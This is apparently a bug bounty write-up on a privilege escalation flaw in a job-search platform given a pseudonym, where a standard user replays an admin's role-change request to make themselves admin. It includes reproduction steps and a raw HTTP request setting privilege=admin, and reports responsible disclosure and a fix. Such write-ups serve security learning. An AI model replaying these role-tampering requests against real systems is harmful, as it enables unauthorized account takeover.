Explore how I discover a role-changing vulnerability at Private program that allowed users to switch roles without admin privileges and get me paid 750$.This write-up provides the steps to reproduce this surprising bug and its potential impact.

Understanding Examlent.com(a pseudonym for the actual platform)

Examlent.com is an online job search and career information platform that connects job seekers with employers. It’s designed to help individuals find jobs, gain insights into salaries, and access valuable company information. Talent.com’s mission is to make the job search experience efficient and effective. As part of its services, Talent.com allows users to create accounts with specific roles and privileges, a crucial aspect of maintaining a secure and organized platform. Among these roles, administrators hold a special status, as they have the authority to manage user roles and permissions within the platform.

The Bug Discovery:

My journey began with an account on Examlet.com, one with standard user privileges, and another with admin privileges. As a responsible bug hunter, I decided to explore the platform, meticulously examining different functionalities. As i found an functionality which allow admin to change the users roles so i think about it what if a low level user can change their permission by themselves. Thats how, stumbled upon a Privilege Escalation bug, a vulnerability that could potentially lead to unauthorized role changes, compromising the platform’s security.

Steps to Reproduce:

Here’s how I found and reproduced the bug:

1. Create Two Accounts: I created two accounts — one with admin privileges and the other with standard user privileges.
2. Capture the Admin Request: I captured the request made when the admin changed a user’s role.
3. User Privilege Change: I used the standard user account’s cookie or request to change its privilege to admin.
4. The request i used is look like this below request:-

POST /employers/settings/ajax/action-update-user.php?country=us&language=en HTTP/1.1
Host: in.examlent.com
Cookie:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,hi;q=0.8,pt;q=0.7
Connection: close
firstName=user&lastName=user&[email protected]&user=FDRsoKzZEYJjdWUYxETG1iFf-bgI*&privilege=admin

5. I sent the request, and like magic, the standard user became an admin.

The Impact:

This bug could have significant consequences, including:

• Unauthorized role changes, leading to unauthorized access.
• Bypassing security measures designed to ensure only administrators can change user roles.
• Potential unauthorized takeovers of administrative privileges.

The Bounty

After responsibly disclosing this vulnerability to Examlet.com, the bug bounty program awarded me a well-deserved $750 bounty. The platform’s security team recognized the severity of the issue and acted swiftly to fix it.

Takeaway

Always explore the admin-level features and permissions with low-level user accounts. You might uncover critical security flaws that can benefit both you and the platform’s security.

Leave some clap if you enjoyed this read, leave your feedback in comment and consider following me for more exciting findings.

Find me on Twitter: @a13h1_

Keep Supporting, Keep Clapping, Keep Commenting.